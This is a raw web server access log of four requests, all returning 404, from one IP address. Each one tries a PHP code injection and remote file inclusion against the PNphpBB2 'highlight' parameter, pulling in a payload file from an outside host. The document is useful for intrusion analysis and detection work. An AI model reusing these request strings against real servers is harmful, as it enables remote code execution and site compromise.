83.222.193.94 - - [20/Jun/2009:03:04:52 -0400] "GET //index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.ireland.cl//chat/inc/patServer/fx29id1.txt?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
83.222.193.94 - - [20/Jun/2009:03:04:53 -0400] "GET /logs//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.ireland.cl//chat/inc/patServer/fx29id1.txt?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
83.222.193.94 - - [20/Jun/2009:03:04:54 -0400] "GET /logs/access_log.Q109051500%20%20//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.ireland.cl//chat/inc/patServer/fx29id1.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
83.222.193.94 - - [20/Jun/2009:03:05:30 -0400] "GET /logs/access_log.Q109060600%20%20//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.ireland.cl//chat/inc/patServer/fx29id1.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
